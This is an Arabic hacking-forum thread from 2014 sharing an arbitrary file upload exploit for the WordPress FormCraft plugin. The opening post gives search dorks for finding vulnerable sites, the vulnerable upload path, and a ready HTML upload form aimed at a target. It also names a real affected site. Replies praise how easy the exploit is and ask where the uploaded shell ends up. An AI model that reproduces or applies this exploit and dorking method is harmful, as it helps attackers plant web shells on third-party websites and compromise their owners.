TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > قسم الحماية - Security section > قسم جديد الثغرات > قسم جديد ثغرات الأعضاء

قسم جديد ثغرات الأعضاء يختص بجديد ثغرات الأعضاء

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 19-12-2014, 09:34 PM
الصورة الرمزية M1rx
M1rx
موقوف
 
حـالة التــواجـد : M1rx غير متواجد حالياً
تاريخ التسجيل: Oct 2014
الجــــنــــــس: ذكـر
المشاركات: 29
شكراً:66
تم شكره 52 مرة في 10 مشاركة
معدل تقييم المستوى: 0
M1rx بدون تقييم
Thumbs up WordPress Plugin FormCraft Arbitrary File Upload Vulnerability

السلام عليكم ورحمة الله وبركاتة

WordPress Plugin FormCraft Arbitrary File Upload Vulnerability

Dork:
كود:
"powered by formcraft"
inurl:plugins/formcraft
exploit :
كود:
http:// [SITE] /wp-content/plugins/formcraft/file-upload/server/content/upload.php
كود بلغة HTML:
<!--
Formcraft Arbitrary File Upload
By AMir dZ 52
WwW.Sec4Ever.CoM
!-->
<form method="POST" action="



http://[TARGET]/wp-content/plugins/formcraft/file-upload/server/content/upload.php



" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>upload file</button>

</form>
مسار الشل:


مواقع مصابة:
كود:
http://wxsolution.com//wp-content//plugins//formcraft//file-upload//server//content/upload.php

من فظلكم متحلبوش هادوك تع اندونيسيا ...
كون تحلبوهم يغزوون كل المواقع  
رد مع اقتباس
21 أعضاء قالوا شكراً لـ M1rx على المشاركة المفيدة:
  #2  
قديم 20-12-2014, 10:01 AM
الصورة الرمزية mehdi17240
mehdi17240
عضو مميز
 
حـالة التــواجـد : mehdi17240 غير متواجد حالياً
تاريخ التسجيل: Apr 2012
الجــــنــــــس: ذكـر
المشاركات: 128
شكراً:3
تم شكره 36 مرة في 26 مشاركة
معدل تقييم المستوى: 0
mehdi17240 بدون تقييم
افتراضي رد: WordPress Plugin FormCraft Arbitrary File Upload Vulnerability

 
رد مع اقتباس
  #3  
قديم 20-12-2014, 11:12 AM
الصورة الرمزية M1rx
M1rx
موقوف
 
حـالة التــواجـد : M1rx غير متواجد حالياً
تاريخ التسجيل: Oct 2014
الجــــنــــــس: ذكـر
المشاركات: 29
شكراً:66
تم شكره 52 مرة في 10 مشاركة
معدل تقييم المستوى: 0
M1rx بدون تقييم
افتراضي رد: WordPress Plugin FormCraft Arbitrary File Upload Vulnerability

اقتباس:
المشاركة الأصلية كتبت بواسطة mehdi17240 مشاهدة المشاركة

والله انا لا اعلم انها موجودة من قبل
انا حملت السكربت و فحصته و وجدت تغرة upload
فنشرتها
+
انا اكتشفت هذه الثغرة منذ اسبوعين والله  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ M1rx على المشاركة المفيدة:
  #4  
قديم 20-12-2014, 03:55 PM
الصورة الرمزية mehdi17240
mehdi17240
عضو مميز
 
حـالة التــواجـد : mehdi17240 غير متواجد حالياً
تاريخ التسجيل: Apr 2012
الجــــنــــــس: ذكـر
المشاركات: 128
شكراً:3
تم شكره 36 مرة في 26 مشاركة
معدل تقييم المستوى: 0
mehdi17240 بدون تقييم
افتراضي رد: WordPress Plugin FormCraft Arbitrary File Upload Vulnerability

اقتباس:
المشاركة الأصلية كتبت بواسطة amir dz 52 مشاهدة المشاركة

والله انا لا اعلم انها موجودة من قبل
انا حملت السكربت و فحصته و وجدت تغرة upload
فنشرتها
+
انا اكتشفت هذه الثغرة منذ اسبوعين والله
اخي الفاضل وانا لم اضع الفيديو الا لتوضيح الثغرة فقط
واصل اخي وربنا يوفقك  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ mehdi17240 على المشاركة المفيدة:
  #5  
قديم 23-12-2014, 12:15 AM
الصورة الرمزية Mr_AnarShi-T
Mr_AnarShi-T
عضو مميز
 
حـالة التــواجـد : Mr_AnarShi-T غير متواجد حالياً
تاريخ التسجيل: Jul 2011
الجــــنــــــس: ذكـر
المشاركات: 260
شكراً:246
تم شكره 717 مرة في 170 مشاركة
معدل تقييم المستوى: 9
Mr_AnarShi-T على طريق التميز
افتراضي رد: WordPress Plugin FormCraft Arbitrary File Upload Vulnerability

ثغرة حلوة إستغلال علي الطاير

 

 

 

Perl & Java Lov3r

No perl No life
رد مع اقتباس
3 أعضاء قالوا شكراً لـ Mr_AnarShi-T على المشاركة المفيدة:
  #6  
قديم 24-12-2014, 09:49 PM
الصورة الرمزية ALgR_Dz 47
ALgR_Dz 47
عضو جديد
 
حـالة التــواجـد : ALgR_Dz 47 غير متواجد حالياً
تاريخ التسجيل: Jul 2013
مكـان الإقامـة : الجزائر
الجــــنــــــس: ذكـر
المشاركات: 24
شكراً:18
تم شكره 9 مرة في 7 مشاركة
معدل تقييم المستوى: 0
ALgR_Dz 47 بدون تقييم
افتراضي رد: WordPress Plugin FormCraft Arbitrary File Upload Vulnerability

مشكل في مسار شيل بعد رفعه  

 

 

[#] اللهم إني أسألك علماً نافعاً ، ورزقاً طيباً ، وعملاً متقبلاً[#]
قال رسول الله صلى الله عليه وسلم** لاخير في كاتم علم **

@ ALgR_Dz 47 @
رد مع اقتباس

الكلمات الدلالية (Tags)
arbitrary, file, formcraft, plugin, upload, vulnerability, wordpress


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[web applications] - Wordpress Formcraft Plugin - SQL Injection Vulnerability inj3ct0r قسم جديد ثغرات مواقع الحماية 0 09-01-2014 09:37 AM
[web applications] - Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit inj3ct0r قسم جديد ثغرات مواقع الحماية 0 20-02-2013 01:49 AM
[web applications] - WordPress File Uploader Plugin PHP File Upload Vulnerability inj3ct0r قسم جديد ثغرات مواقع الحماية 0 28-01-2013 02:34 AM
[webapps / 0day] - Wordpress Kish Guest Posting Plugin 1.0 Arbitrary File Upload inj3ct0r قسم جديد ثغرات مواقع الحماية 0 03-02-2012 01:42 AM
[webapps / 0day] - AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary File Upload inj3ct0r قسم جديد ثغرات مواقع الحماية 0 03-02-2012 01:42 AM


الساعة الآن 06:08 PM